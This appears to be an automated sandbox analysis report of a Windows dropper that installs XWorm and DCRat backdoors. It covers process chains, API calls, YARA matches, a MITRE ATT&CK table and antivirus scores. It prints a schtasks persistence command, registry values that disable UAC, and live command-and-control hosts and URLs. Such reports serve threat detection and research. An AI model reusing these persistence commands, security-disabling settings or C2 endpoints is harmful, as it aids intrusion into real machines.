Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008EF063 SetUnhandledExceptionFilter,	2_2_008EF063
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008EF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_008EF22B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008F866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_008F866F
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 2_2_008EEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_008EEF05

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe

Code function: 0_2_00007FF7C019ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF7C019ECE0

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\file.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\hUqNkgIMv7nY24UYezK0etl.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 8 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe

Code function: 0_2_00007FF7C018DBDC cpuid

0_2_00007FF7C018DBDC

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: GetLocaleInfoW,GetNumberFormatW,		0_2_00007FF7C019DE44
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: GetLocaleInfoW,GetNumberFormatW,		2_2_008EA63C

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\XClient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Queries volume information: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Queries volume information: C:\Program Files (x86)\jDownloader\config\conhost.exe VolumeInformation
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Queries volume information: C:\Program Files (x86)\jDownloader\config\conhost.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe VolumeInformation

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe

Code function: 0_2_00007FF7C01A400C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF7C01A400C

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe

Code function: 0_2_00007FF7C0186768 GetVersionExW,

0_2_00007FF7C0186768

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable UAC(promptonsecuredesktop)

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe

Registry value created: PromptOnSecureDesktop 0

Disables UAC (registry)

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Source: XClient.exe, 00000003.00000002.4155365471.0000000000872000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000003.00000002.4155365471.00000000008C1000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000003.00000002.4194286088.000000001B690000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000003.00000002.4194286088.000000001B702000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000029.00000002.1997852879.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1889481824.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1889481824.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1976381139.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1958522017.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.1997852879.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1902459797.000000001290D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ServerWeb.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 2008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe PID: 7368, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: Result.exe, type: SAMPLE
Source: Yara match	File source: 1.3.Result.exe.b10a30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Result.exe.7c9678.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.XClient.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Result.exe.7c9678.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.Result.exe.b10a30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Result.exe.b08218.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Result.exe.466afd.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Result.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Result.exe.415eec.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1702782236.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.1702689242.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1703441913.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.1684955911.0000000000408000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ywXeiXEvP2.exe PID: 6852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Result.exe PID: 4900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7204, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000029.00000002.1997852879.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1889481824.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1889481824.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1976381139.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1958522017.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.1997852879.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1902459797.000000001290D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ServerWeb.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 2008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe PID: 7368, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: Result.exe, type: SAMPLE
Source: Yara match	File source: 1.3.Result.exe.b10a30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Result.exe.7c9678.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.XClient.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Result.exe.7c9678.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.Result.exe.b10a30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Result.exe.b08218.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Result.exe.466afd.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Result.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Result.exe.415eec.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1702782236.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.1702689242.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1703441913.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.1684955911.0000000000408000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ywXeiXEvP2.exe PID: 6852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Result.exe PID: 4900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7204, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	12 Scripting	Valid Accounts	211 Windows Management Instrumentation	12 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Bypass User Account Control	21 Obfuscated Files or Information	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	321 Registry Run Keys / Startup Folder	11 Process Injection	21 Software Packing	NTDS	241 Security Software Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	321 Registry Run Keys / Startup Folder	1 Bypass User Account Control	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	23 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	131 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ywXeiXEvP2.exe	74%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\XClient.exe	100%	Avira	HEUR/AGEN.1305769
C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe	100%	Avira	HEUR/AGEN.1323984
C:\Recovery\XClient.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Roaming\XClient.exe	100%	Avira	HEUR/AGEN.1305769
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe	100%	Avira	VBS/Runner.VPG
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	100%	Avira	VBS/Runner.VPG
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\jDownloader\config\conhost.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	100%	Avira	VBS/Runner.VPG
C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	100%	Avira	VBS/Runner.VPG
C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files\Uninstall Information\OfficeClickToRun.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\sihost.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\XClient.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe	100%	Joe Sandbox ML
C:\Recovery\XClient.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\XClient.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\jDownloader\config\conhost.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	100%	Joe Sandbox ML
C:\Program Files\Uninstall Information\OfficeClickToRun.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\sihost.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files (x86)\jDownloader\config\conhost.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\Uninstall Information\OfficeClickToRun.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\XClient.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	73%	ReversingLabs	ByteCode-MSIL.Trojan.Uztuby
C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	95%	ReversingLabs	Win32.Trojan.DisguisedXMRigMiner
C:\Users\user\AppData\Local\Temp\XClient.exe	96%	ReversingLabs	ByteCode-MSIL.Backdoor.XWorm
C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\sihost.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Users\user\AppData\Roaming\XClient.exe	96%	ReversingLabs	ByteCode-MSIL.Backdoor.XWorm
C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Windows\IME\IMEKR\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat

Source	Detection	Scanner	Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
127.0.0.1	0%	Avira URL Cloud	safe
letter-takes.gl.at.ply.gg	0%	Avira URL Cloud	safe
http://a0991799.xsph.ru/@=AjM2MDZ4kjN	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
letter-takes.gl.at.ply.gg	147.185.221.19	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
letter-takes.gl.at.ply.gg	true	Avira URL Cloud: safe	unknown
http://a0991799.xsph.ru/@=AjM2MDZ4kjN	true	Avira URL Cloud: malware	unknown
127.0.0.1	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	XClient.exe, 00000003.00000002.4161351133.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, ServerWeb.exe, 00000008.00000002.1889481824.0000000002901000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

